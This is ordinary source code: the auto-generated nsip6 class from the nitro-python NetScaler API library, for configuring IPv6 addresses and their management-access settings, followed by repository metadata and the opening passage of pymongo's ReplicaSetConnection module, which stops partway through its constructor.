ur"""IPv6 address to create on the NetScaler appliance.<br/>Minimum length = 1.
"""
try :
return self._ipv6address
except Exception as e:
raise e
@ipv6address.setter
def ipv6address(self, ipv6address) :
ur"""IPv6 address to create on the NetScaler appliance.<br/>Minimum length = 1
"""
try :
self._ipv6address = ipv6address
except Exception as e:
raise e
@property
def scope(self) :
ur"""Scope of the IPv6 address to be created. Cannot be changed after the IP address is created.<br/>Default value: global<br/>Possible values = global, link-local.
"""
try :
return self._scope
except Exception as e:
raise e
@scope.setter
def scope(self, scope) :
ur"""Scope of the IPv6 address to be created. Cannot be changed after the IP address is created.<br/>Default value: global<br/>Possible values = global, link-local
"""
try :
self._scope = scope
except Exception as e:
raise e
@property
def type(self) :
ur"""Type of IP address to be created on the NetScaler appliance. Cannot be changed after the IP address is created.<br/>Default value: SNIP<br/>Possible values = NSIP, VIP, SNIP, GSLBsiteIP, ADNSsvcIP, CLIP.
"""
try :
return self._type
except Exception as e:
raise e
@type.setter
def type(self, type) :
ur"""Type of IP address to be created on the NetScaler appliance. Cannot be changed after the IP address is created.<br/>Default value: SNIP<br/>Possible values = NSIP, VIP, SNIP, GSLBsiteIP, ADNSsvcIP, CLIP
"""
try :
self._type = type
except Exception as e:
raise e
@property
def vlan(self) :
ur"""The VLAN number.<br/>Default value: 0<br/>Maximum length = 4094.
"""
try :
return self._vlan
except Exception as e:
raise e
@vlan.setter
def vlan(self, vlan) :
ur"""The VLAN number.<br/>Default value: 0<br/>Maximum length = 4094
"""
try :
self._vlan = vlan
except Exception as e:
raise e
@property
def nd(self) :
ur"""Respond to Neighbor Discovery (ND) requests for this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._nd
except Exception as e:
raise e
@nd.setter
def nd(self, nd) :
ur"""Respond to Neighbor Discovery (ND) requests for this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._nd = nd
except Exception as e:
raise e
@property
def icmp(self) :
ur"""Respond to ICMP requests for this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._icmp
except Exception as e:
raise e
@icmp.setter
def icmp(self, icmp) :
ur"""Respond to ICMP requests for this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._icmp = icmp
except Exception as e:
raise e
@property
def vserver(self) :
ur"""Enable or disable the state of all the virtual servers associated with this VIP6 address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._vserver
except Exception as e:
raise e
@vserver.setter
def vserver(self, vserver) :
ur"""Enable or disable the state of all the virtual servers associated with this VIP6 address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._vserver = vserver
except Exception as e:
raise e
@property
def telnet(self) :
ur"""Allow Telnet access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._telnet
except Exception as e:
raise e
@telnet.setter
def telnet(self, telnet) :
ur"""Allow Telnet access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._telnet = telnet
except Exception as e:
raise e
@property
def ftp(self) :
ur"""Allow File Transfer Protocol (FTP) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._ftp
except Exception as e:
raise e
@ftp.setter
def ftp(self, ftp) :
ur"""Allow File Transfer Protocol (FTP) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._ftp = ftp
except Exception as e:
raise e
@property
def gui(self) :
ur"""Allow graphical user interface (GUI) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, SECUREONLY, DISABLED.
"""
try :
return self._gui
except Exception as e:
raise e
@gui.setter
def gui(self, gui) :
ur"""Allow graphical user interface (GUI) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, SECUREONLY, DISABLED
"""
try :
self._gui = gui
except Exception as e:
raise e
@property
def ssh(self) :
ur"""Allow secure Shell (SSH) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._ssh
except Exception as e:
raise e
@ssh.setter
def ssh(self, ssh) :
ur"""Allow secure Shell (SSH) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._ssh = ssh
except Exception as e:
raise e
@property
def snmp(self) :
ur"""Allow Simple Network Management Protocol (SNMP) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._snmp
except Exception as e:
raise e
@snmp.setter
def snmp(self, snmp) :
ur"""Allow Simple Network Management Protocol (SNMP) access to this IP address.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._snmp = snmp
except Exception as e:
raise e
@property
def mgmtaccess(self) :
ur"""Allow access to management applications on this IP address.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._mgmtaccess
except Exception as e:
raise e
@mgmtaccess.setter
def mgmtaccess(self, mgmtaccess) :
ur"""Allow access to management applications on this IP address.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._mgmtaccess = mgmtaccess
except Exception as e:
raise e
@property
def restrictaccess(self) :
ur"""Block access to nonmanagement applications on this IP address. This option is applicable forMIP6s, SNIP6s, and NSIP6s, and is disabled by default. Nonmanagement applications can run on the underlying NetScaler Free BSD operating system.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._restrictaccess
except Exception as e:
raise e
@restrictaccess.setter
def restrictaccess(self, restrictaccess) :
ur"""Block access to nonmanagement applications on this IP address. This option is applicable forMIP6s, SNIP6s, and NSIP6s, and is disabled by default. Nonmanagement applications can run on the underlying NetScaler Free BSD operating system.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._restrictaccess = restrictaccess
except Exception as e:
raise e
@property
def dynamicrouting(self) :
ur"""Allow dynamic routing on this IP address. Specific to Subnet IPv6 (SNIP6) address.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._dynamicrouting
except Exception as e:
raise e
@dynamicrouting.setter
def dynamicrouting(self, dynamicrouting) :
ur"""Allow dynamic routing on this IP address. Specific to Subnet IPv6 (SNIP6) address.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._dynamicrouting = dynamicrouting
except Exception as e:
raise e
@property
def hostroute(self) :
ur"""Advertise a route for the VIP6 address by using the dynamic routing protocols running on the NetScaler appliance.<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._hostroute
except Exception as e:
raise e
@hostroute.setter
def hostroute(self, hostroute) :
ur"""Advertise a route for the VIP6 address by using the dynamic routing protocols running on the NetScaler appliance.<br/>Possible values = ENABLED, DISABLED
"""
try :
self._hostroute = hostroute
except Exception as e:
raise e
@property
def ip6hostrtgw(self) :
ur"""IPv6 address of the gateway for the route. If Gateway is not set, VIP uses :: as the gateway.<br/>Default value: 0.
"""
try :
return self._ip6hostrtgw
except Exception as e:
raise e
@ip6hostrtgw.setter
def ip6hostrtgw(self, ip6hostrtgw) :
ur"""IPv6 address of the gateway for the route. If Gateway is not set, VIP uses :: as the gateway.<br/>Default value: 0
"""
try :
self._ip6hostrtgw = ip6hostrtgw
except Exception as e:
raise e
@property
def metric(self) :
ur"""Integer value to add to or subtract from the cost of the route advertised for the VIP6 address.<br/>Minimum length = -16777215.
"""
try :
return self._metric
except Exception as e:
raise e
@metric.setter
def metric(self, metric) :
ur"""Integer value to add to or subtract from the cost of the route advertised for the VIP6 address.<br/>Minimum length = -16777215
"""
try :
self._metric = metric
except Exception as e:
raise e
@property
def vserverrhilevel(self) :
ur"""Advertise or do not advertise the route for the Virtual IP (VIP6) address on the basis of the state of the virtual servers associated with that VIP6.
* NONE - Advertise the route for the VIP6 address, irrespective of the state of the virtual servers associated with the address.
* ONE VSERVER - Advertise the route for the VIP6 address if at least one of the associated virtual servers is in UP state.
* ALL VSERVER - Advertise the route for the VIP6 address if all of the associated virtual servers are in UP state.
* VSVR_CNTRLD. Advertise the route for the VIP address according to the RHIstate (RHI STATE) parameter setting on all the associated virtual servers of the VIP address along with their states.
When Vserver RHI Level (RHI) parameter is set to VSVR_CNTRLD, the following are different RHI behaviors for the VIP address on the basis of RHIstate (RHI STATE) settings on the virtual servers associated with the VIP address:
* If you set RHI STATE to PASSIVE on all virtual servers, the NetScaler ADC always advertises the route for the VIP address.
* If you set RHI STATE to ACTIVE on all virtual servers, the NetScaler ADC advertises the route for the VIP address if at least one of the associated virtual servers is in UP state.
*If you set RHI STATE to ACTIVE on some and PASSIVE on others, the NetScaler ADC advertises the route for the VIP address if at least one of the associated virtual servers, whose RHI STATE set to ACTIVE, is in UP state.<br/>Default value: ONE_VSERVER<br/>Possible values = ONE_VSERVER, ALL_VSERVERS, NONE, VSVR_CNTRLD.
"""
try :
return self._vserverrhilevel
except Exception as e:
raise e
@vserverrhilevel.setter
def vserverrhilevel(self, vserverrhilevel) :
ur"""Advertise or do not advertise the route for the Virtual IP (VIP6) address on the basis of the state of the virtual servers associated with that VIP6.
* NONE - Advertise the route for the VIP6 address, irrespective of the state of the virtual servers associated with the address.
* ONE VSERVER - Advertise the route for the VIP6 address if at least one of the associated virtual servers is in UP state.
* ALL VSERVER - Advertise the route for the VIP6 address if all of the associated virtual servers are in UP state.
* VSVR_CNTRLD. Advertise the route for the VIP address according to the RHIstate (RHI STATE) parameter setting on all the associated virtual servers of the VIP address along with their states.
When Vserver RHI Level (RHI) parameter is set to VSVR_CNTRLD, the following are different RHI behaviors for the VIP address on the basis of RHIstate (RHI STATE) settings on the virtual servers associated with the VIP address:
* If you set RHI STATE to PASSIVE on all virtual servers, the NetScaler ADC always advertises the route for the VIP address.
* If you set RHI STATE to ACTIVE on all virtual servers, the NetScaler ADC advertises the route for the VIP address if at least one of the associated virtual servers is in UP state.
*If you set RHI STATE to ACTIVE on some and PASSIVE on others, the NetScaler ADC advertises the route for the VIP address if at least one of the associated virtual servers, whose RHI STATE set to ACTIVE, is in UP state.<br/>Default value: ONE_VSERVER<br/>Possible values = ONE_VSERVER, ALL_VSERVERS, NONE, VSVR_CNTRLD
"""
try :
self._vserverrhilevel = vserverrhilevel
except Exception as e:
raise e
@property
def ospf6lsatype(self) :
ur"""Type of LSAs to be used by the IPv6 OSPF protocol, running on the NetScaler appliance, for advertising the route for the VIP6 address.<br/>Default value: EXTERNAL<br/>Possible values = INTRA_AREA, EXTERNAL.
"""
try :
return self._ospf6lsatype
except Exception as e:
raise e
@ospf6lsatype.setter
def ospf6lsatype(self, ospf6lsatype) :
ur"""Type of LSAs to be used by the IPv6 OSPF protocol, running on the NetScaler appliance, for advertising the route for the VIP6 address.<br/>Default value: EXTERNAL<br/>Possible values = INTRA_AREA, EXTERNAL
"""
try :
self._ospf6lsatype = ospf6lsatype
except Exception as e:
raise e
@property
def ospfarea(self) :
ur"""ID of the area in which the Intra-Area-Prefix LSAs are to be advertised for the VIP6 address by the IPv6 OSPF protocol running on the NetScaler appliance. When ospfArea is not set, VIP6 is advertised on all areas.<br/>Default value: -1<br/>Maximum length = 4294967294LU.
"""
try :
return self._ospfarea
except Exception as e:
raise e
@ospfarea.setter
def ospfarea(self, ospfarea) :
ur"""ID of the area in which the Intra-Area-Prefix LSAs are to be advertised for the VIP6 address by the IPv6 OSPF protocol running on the NetScaler appliance. When ospfArea is not set, VIP6 is advertised on all areas.<br/>Default value: -1<br/>Maximum length = 4294967294LU
"""
try :
self._ospfarea = ospfarea
except Exception as e:
raise e
@property
def state(self) :
ur"""Enable or disable the IP address.<br/>Default value: ENABLED<br/>Possible values = DISABLED, ENABLED.
"""
try :
return self._state
except Exception as e:
raise e
@state.setter
def state(self, state) :
ur"""Enable or disable the IP address.<br/>Default value: ENABLED<br/>Possible values = DISABLED, ENABLED
"""
try :
self._state = state
except Exception as e:
raise e
@property
def map(self) :
ur"""Mapped IPV4 address for the IPV6 address.
"""
try :
return self._map
except Exception as e:
raise e
@map.setter
def map(self, map) :
ur"""Mapped IPV4 address for the IPV6 address.
"""
try :
self._map = map
except Exception as e:
raise e
@property
def ownernode(self) :
ur"""ID of the cluster node for which you are adding the IP address. Must be used if you want the IP address to be active only on the specific node. Can be configured only through the cluster IP address. Cannot be changed after the IP address is created.<br/>Default value: 255.
"""
try :
return self._ownernode
except Exception as e:
raise e
@ownernode.setter
def ownernode(self, ownernode) :
ur"""ID of the cluster node for which you are adding the IP address. Must be used if you want the IP address to be active only on the specific node. Can be configured only through the cluster IP address. Cannot be changed after the IP address is created.<br/>Default value: 255
"""
try :
self._ownernode = ownernode
except Exception as e:
raise e
@property
def td(self) :
ur"""Integer value that uniquely identifies the traffic domain in which you want to configure the entity. If you do not specify an ID, the entity becomes part of the default traffic domain, which has an ID of 0.<br/>Maximum length = 4094.
"""
try :
return self._td
except Exception as e:
raise e
@td.setter
def td(self, td) :
ur"""Integer value that uniquely identifies the traffic domain in which you want to configure the entity. If you do not specify an ID, the entity becomes part of the default traffic domain, which has an ID of 0.<br/>Maximum length = 4094
"""
try :
self._td = td
except Exception as e:
raise e
@property
def iptype(self) :
ur"""The type of the IPv6 address.<br/>Possible values = NSIP, VIP, SNIP, GSLBsiteIP, ADNSsvcIP, CLIP.
"""
try :
return self._iptype
except Exception as e:
raise e
@property
def curstate(self) :
ur"""Current state of this IP.<br/>Default value: ENABLED<br/>Possible values = DISABLED, ENABLED.
"""
try :
return self._curstate
except Exception as e:
raise e
@property
def viprtadv2bsd(self) :
ur"""Whether this route is advertised to FreeBSD.
"""
try :
return self._viprtadv2bsd
except Exception as e:
raise e
@property
def vipvsercount(self) :
ur"""Number of vservers bound to this VIP.
"""
try :
return self._vipvsercount
except Exception as e:
raise e
@property
def vipvserdowncount(self) :
ur"""Number of vservers bound to this VIP, which are down.
"""
try :
return self._vipvserdowncount
except Exception as e:
raise e
@property
def systemtype(self) :
ur"""The type of the System. Possible Values: Standalone, HA, Cluster. Used for display purpose.<br/>Possible values = Stand-alone, HA, Cluster.
"""
try :
return self._systemtype
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(nsip6_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.nsip6
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
if self.ipv6address is not None :
return str(self.ipv6address)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
ur""" Use this API to add nsip6.
"""
try :
if type(resource) is not list :
addresource = nsip6()
addresource.ipv6address = resource.ipv6address
addresource.scope = resource.scope
addresource.type = resource.type
addresource.vlan = resource.vlan
addresource.nd = resource.nd
addresource.icmp = resource.icmp
addresource.vserver = resource.vserver
addresource.telnet = resource.telnet
addresource.ftp = resource.ftp
addresource.gui = resource.gui
addresource.ssh = resource.ssh
addresource.snmp = resource.snmp
addresource.mgmtaccess = resource.mgmtaccess
addresource.restrictaccess = resource.restrictaccess
addresource.dynamicrouting = resource.dynamicrouting
addresource.hostroute = resource.hostroute
addresource.ip6hostrtgw = resource.ip6hostrtgw
addresource.metric = resource.metric
addresource.vserverrhilevel = resource.vserverrhilevel
addresource.ospf6lsatype = resource.ospf6lsatype
addresource.ospfarea = resource.ospfarea
addresource.state = resource.state
addresource.map = resource.map
addresource.ownernode = resource.ownernode
addresource.td = resource.td
return addresource.add_resource(client)
else :
if (resource and len(resource) > 0) :
addresources = [ nsip6() for _ in range(len(resource))]
for i in range(len(resource)) :
addresources[i].ipv6address = resource[i].ipv6address
addresources[i].scope = resource[i].scope
addresources[i].type = resource[i].type
addresources[i].vlan = resource[i].vlan
addresources[i].nd = resource[i].nd
addresources[i].icmp = resource[i].icmp
addresources[i].vserver = resource[i].vserver
addresources[i].telnet = resource[i].telnet
addresources[i].ftp = resource[i].ftp
addresources[i].gui = resource[i].gui
addresources[i].ssh = resource[i].ssh
addresources[i].snmp = resource[i].snmp
addresources[i].mgmtaccess = resource[i].mgmtaccess
addresources[i].restrictaccess = resource[i].restrictaccess
addresources[i].dynamicrouting = resource[i].dynamicrouting
addresources[i].hostroute = resource[i].hostroute
addresources[i].ip6hostrtgw = resource[i].ip6hostrtgw
addresources[i].metric = resource[i].metric
addresources[i].vserverrhilevel = resource[i].vserverrhilevel
addresources[i].ospf6lsatype = resource[i].ospf6lsatype
addresources[i].ospfarea = resource[i].ospfarea
addresources[i].state = resource[i].state
addresources[i].map = resource[i].map
addresources[i].ownernode = resource[i].ownernode
addresources[i].td = resource[i].td
result = cls.add_bulk_request(client, addresources)
return result
except Exception as e :
raise e
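    # Illustrative usage sketch for add() above (added; the `client` nitro_service
    # instance and the address below are assumptions, not part of this module):
    #   ip6 = nsip6()
    #   ip6.ipv6address = "2001:db8::5"
    #   ip6.type = nsip6.Type.SNIP
    #   nsip6.add(client, ip6)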
@classmethod
def delete(cls, client, resource) :
ur""" Use this API to delete nsip6.
"""
try :
if type(resource) is not list :
deleteresource = nsip6()
if type(resource) != type(deleteresource):
deleteresource.ipv6address = resource
else :
deleteresource.ipv6address = resource.ipv6address
deleteresource.td = resource.td
return deleteresource.delete_resource(client)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
deleteresources = [ nsip6() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].ipv6address = resource[i]
else :
if (resource and len(resource) > 0) :
deleteresources = [ nsip6() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].ipv6address = resource[i].ipv6address
deleteresources[i].td = resource[i].td
result = cls.delete_bulk_request(client, deleteresources)
return result
except Exception as e :
raise e
@classmethod
def update(cls, client, resource) :
ur""" Use this API to update nsip6.
"""
try :
if type(resource) is not list :
updateresource = nsip6()
updateresource.ipv6address = resource.ipv6address
updateresource.td = resource.td
updateresource.nd = resource.nd
updateresource.icmp = resource.icmp
updateresource.vserver = resource.vserver
updateresource.telnet = resource.telnet
updateresource.ftp = resource.ftp
updateresource.gui = resource.gui
updateresource.ssh = resource.ssh
updateresource.snmp = resource.snmp
updateresource.mgmtaccess = resource.mgmtaccess
updateresource.restrictaccess = resource.restrictaccess
updateresource.state = resource.state
updateresource.map = resource.map
updateresource.dynamicrouting = resource.dynamicrouting
updateresource.hostroute = resource.hostroute
updateresource.ip6hostrtgw = resource.ip6hostrtgw
updateresource.metric = resource.metric
updateresource.vserverrhilevel = resource.vserverrhilevel
updateresource.ospf6lsatype = resource.ospf6lsatype
updateresource.ospfarea = resource.ospfarea
return updateresource.update_resource(client)
else :
if (resource and len(resource) > 0) :
updateresources = [ nsip6() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].ipv6address = resource[i].ipv6address
updateresources[i].td = resource[i].td
updateresources[i].nd = resource[i].nd
updateresources[i].icmp = resource[i].icmp
updateresources[i].vserver = resource[i].vserver
updateresources[i].telnet = resource[i].telnet
updateresources[i].ftp = resource[i].ftp
updateresources[i].gui = resource[i].gui
updateresources[i].ssh = resource[i].ssh
updateresources[i].snmp = resource[i].snmp
updateresources[i].mgmtaccess = resource[i].mgmtaccess
updateresources[i].restrictaccess = resource[i].restrictaccess
updateresources[i].state = resource[i].state
updateresources[i].map = resource[i].map
updateresources[i].dynamicrouting = resource[i].dynamicrouting
updateresources[i].hostroute = resource[i].hostroute
updateresources[i].ip6hostrtgw = resource[i].ip6hostrtgw
updateresources[i].metric = resource[i].metric
updateresources[i].vserverrhilevel = resource[i].vserverrhilevel
updateresources[i].ospf6lsatype = resource[i].ospf6lsatype
updateresources[i].ospfarea = resource[i].ospfarea
result = cls.update_bulk_request(client, updateresources)
return result
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
ur""" Use this API to unset the properties of nsip6 resource.
Properties that need to be unset are specified in args array.
"""
try :
if type(resource) is not list :
unsetresource = nsip6()
if type(resource) != type(unsetresource):
unsetresource.ipv6address = resource
else :
unsetresource.ipv6address = resource.ipv6address
unsetresource.td = resource.td
return unsetresource.unset_resource(client, args)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
unsetresources = [ nsip6() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].ipv6address = resource[i]
else :
if (resource and len(resource) > 0) :
unsetresources = [ nsip6() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].ipv6address = resource[i].ipv6address
unsetresources[i].td = resource[i].td
result = cls.unset_bulk_request(client, unsetresources, args)
return result
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
ur""" Use this API to fetch all the nsip6 resources that are configured on netscaler.
"""
try :
if not name :
obj = nsip6()
response = obj.get_resources(client, option_)
else :
if type(name) == cls :
if type(name) is not list :
option_ = options()
option_.args = nitro_util.object_to_string_withoutquotes(name)
response = name.get_resource(client, option_)
else :
if name and len(name) > 0 :
response = [nsip6() for _ in range(len(name))]
for i in range(len(name)) :
option_ = options()
option_.args = nitro_util.object_to_string_withoutquotes(name[i])
response[i] = name[i].get_resource(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
ur""" Use this API to fetch filtered set of nsip6 resources.
		filter string should be in JSON format, e.g.: "port:80,servicetype:HTTP".
"""
try :
obj = nsip6()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
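    # Illustrative usage sketch for get_filtered() above (added; `client` is an
    # assumed nitro_service instance): fetch every configured VIP6 address.
    #   vips = nsip6.get_filtered(client, "type:VIP")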
@classmethod
def count(cls, client) :
ur""" Use this API to count the nsip6 resources configured on NetScaler.
"""
try :
obj = nsip6()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
ur""" Use this API to count filtered the set of nsip6 resources.
		Filter string should be in JSON format, e.g.: "port:80,servicetype:HTTP".
"""
try :
obj = nsip6()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class Iptype:
NSIP = "NSIP"
VIP = "VIP"
SNIP = "SNIP"
GSLBsiteIP = "GSLBsiteIP"
ADNSsvcIP = "ADNSsvcIP"
CLIP = "CLIP"
class Ssh:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class State:
DISABLED = "DISABLED"
ENABLED = "ENABLED"
class Ospf6lsatype:
INTRA_AREA = "INTRA_AREA"
EXTERNAL = "EXTERNAL"
class Scope:
GLOBAL = "global"
link_local = "link-local"
class Nd:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Systemtype:
Stand_alone = "Stand-alone"
HA = "HA"
Cluster = "Cluster"
class Gui:
ENABLED = "ENABLED"
SECUREONLY = "SECUREONLY"
DISABLED = "DISABLED"
class Dynamicrouting:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Type:
NSIP = "NSIP"
VIP = "VIP"
SNIP = "SNIP"
GSLBsiteIP = "GSLBsiteIP"
ADNSsvcIP = "ADNSsvcIP"
CLIP = "CLIP"
class Mgmtaccess:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Hostroute:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Ftp:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Vserverrhilevel:
ONE_VSERVER = "ONE_VSERVER"
ALL_VSERVERS = "ALL_VSERVERS"
NONE = "NONE"
VSVR_CNTRLD = "VSVR_CNTRLD"
class Icmp:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Vserver:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Snmp:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Curstate:
DISABLED = "DISABLED"
ENABLED = "ENABLED"
class Restrictaccess:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Telnet:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class nsip6_response(base_response) :
def __init__(self, length=1) :
self.nsip6 = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.nsip6 = [nsip6() for _ in range(length)]
| {
"content_hash": "5e606d890b76aa8dd2e65f39ab7edfcb",
"timestamp": "",
"source": "github",
"line_count": 954,
"max_line_length": 320,
"avg_line_length": 32.81341719077568,
"alnum_prop": 0.7013800153335037,
"repo_name": "atopuzov/nitro-python",
"id": "daa52249177be33bd2351385f69bd8338175b1c4",
"size": "31918",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "nssrc/com/citrix/netscaler/nitro/resource/config/ns/nsip6.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "10881939"
},
{
"name": "Shell",
"bytes": "513"
}
],
"symlink_target": ""
} |
"""Tools for connecting to a MongoDB replica set.
.. seealso:: :doc:`/examples/replica_set` for more examples of how to
connect to a replica set.
To get a :class:`~pymongo.database.Database` instance from a
:class:`ReplicaSetConnection` use either dictionary-style or
attribute-style access:
.. doctest::
>>> from pymongo import ReplicaSetConnection
>>> c = ReplicaSetConnection('localhost:27017', replicaSet='repl0')
>>> c.test_database
Database(ReplicaSetConnection([u'...', u'...']), u'test_database')
>>> c['test_database']
Database(ReplicaSetConnection([u'...', u'...']), u'test_database')
"""
import datetime
import socket
import struct
import sys
import threading
import time
import warnings
import weakref
from bson.son import SON
from pymongo import (common,
database,
helpers,
message,
pool,
uri_parser,
ReadPreference)
from pymongo.errors import (AutoReconnect,
ConfigurationError,
ConnectionFailure,
DuplicateKeyError,
InvalidDocument,
OperationFailure)
if sys.platform.startswith('java'):
from select import cpython_compatible_select as select
else:
from select import select
MAX_BSON_SIZE = 4 * 1024 * 1024
def _closed(sock):
"""Return True if we know socket has been closed, False otherwise.
"""
try:
readers, _, _ = select([sock], [], [], 0)
# Any exception here is equally bad (select.error, ValueError, etc.).
except Exception:
return True
return len(readers) > 0
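# Note (added for clarity): for an idle pooled socket, select() reporting the
# descriptor as readable almost always means the peer has closed the connection
# (EOF counts as "readable"), which is why readability is treated here as
# "closed" rather than as pending data.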
def _partition_node(node):
"""Split a host:port string returned from mongod/s into
a (host, int(port)) pair needed for socket.connect().
"""
host = node
port = 27017
idx = node.rfind(':')
if idx != -1:
host, port = node[:idx], int(node[idx + 1:])
if host.startswith('['):
host = host[1:-1]
return host, port
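# Worked examples for _partition_node (added for clarity):
#   _partition_node("db1.example.net:27018") -> ("db1.example.net", 27018)
#   _partition_node("localhost")             -> ("localhost", 27017)
#   _partition_node("[::1]:27017")           -> ("::1", 27017)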
class Monitor(threading.Thread):
def __init__(self, obj, interval=5):
super(Monitor, self).__init__()
self.obj = weakref.proxy(obj)
self.interval = interval
def run(self):
while True:
try:
self.obj.refresh()
# The connection object has been
# collected so we should die.
except ReferenceError:
break
except:
pass
time.sleep(self.interval)
class ReplicaSetConnection(common.BaseObject):
"""Connection to a MongoDB replica set.
"""
def __init__(self, hosts_or_uri=None, max_pool_size=10,
document_class=dict, tz_aware=False, **kwargs):
"""Create a new connection to a MongoDB replica set.
The resultant connection object has connection-pooling built
in. It also performs auto-reconnection when necessary. If an
operation fails because of a connection error,
:class:`~pymongo.errors.ConnectionFailure` is raised. If
auto-reconnection will be performed,
:class:`~pymongo.errors.AutoReconnect` will be
raised. Application code should handle this exception
(recognizing that the operation failed) and then continue to
execute.
Raises :class:`~pymongo.errors.ConnectionFailure` if
the connection cannot be made.
The `hosts_or_uri` parameter can be a full `mongodb URI
<http://dochub.mongodb.org/core/connections>`_, in addition to
a string of `host:port` pairs (e.g. 'host1:port1,host2:port2').
If `hosts_or_uri` is None 'localhost:27017' will be used.
:Parameters:
- `hosts_or_uri` (optional): A MongoDB URI or string of `host:port`
pairs. If a host is an IPv6 literal it must be enclosed in '[' and
']' characters following the RFC2732 URL syntax (e.g. '[::1]' for
localhost)
- `max_pool_size` (optional): The maximum size limit for
each connection pool.
- `document_class` (optional): default class to use for
documents returned from queries on this connection
- `tz_aware` (optional): if ``True``,
:class:`~datetime.datetime` instances returned as values
in a document by this :class:`Connection` will be timezone
aware (otherwise they will be naive)
- `replicaSet`: (required) The name of the replica set to connect to.
The driver will verify that each host it connects to is a member of
this replica set. Can be passed as a keyword argument or as a
MongoDB URI option.
Other optional parameters can be passed as keyword arguments:
- `safe`: Use getlasterror for each write operation?
          - `j` or `journal`: Block until write operations have been committed
to the journal. Ignored if the server is running without
journaling. Implies safe=True.
- `w`: (integer or string) If this is a replica set write operations
won't return until they have been replicated to the specified
number or tagged set of servers.
Implies safe=True.
- `wtimeoutMS`: Used in conjunction with `j` and/or `w`. Wait this
many milliseconds for journal acknowledgement and/or write
replication. Implies safe=True.
- `fsync`: Force the database to fsync all files before returning
When used with `j` the server awaits the next group commit before
returning. Implies safe=True.
- `socketTimeoutMS`: How long a send or receive on a socket can take
before timing out.
- `connectTimeoutMS`: How long a connection can take to be opened
before timing out.
- `ssl`: If True, create the connection to the servers using SSL.
- `read_preference`: The read preference for this connection.
See :class:`~pymongo.ReadPreference` for available options.
- `slave_okay` or `slaveOk` (deprecated): Use `read_preference`
instead.
.. versionadded:: 2.1
"""
self.__max_pool_size = max_pool_size
self.__document_class = document_class
self.__tz_aware = tz_aware
self.__opts = {}
self.__seeds = set()
self.__hosts = None
self.__arbiters = set()
self.__writer = None
self.__readers = []
self.__pools = {}
self.__index_cache = {}
self.__auth_credentials = {}
username = None
db_name = None
if hosts_or_uri is None:
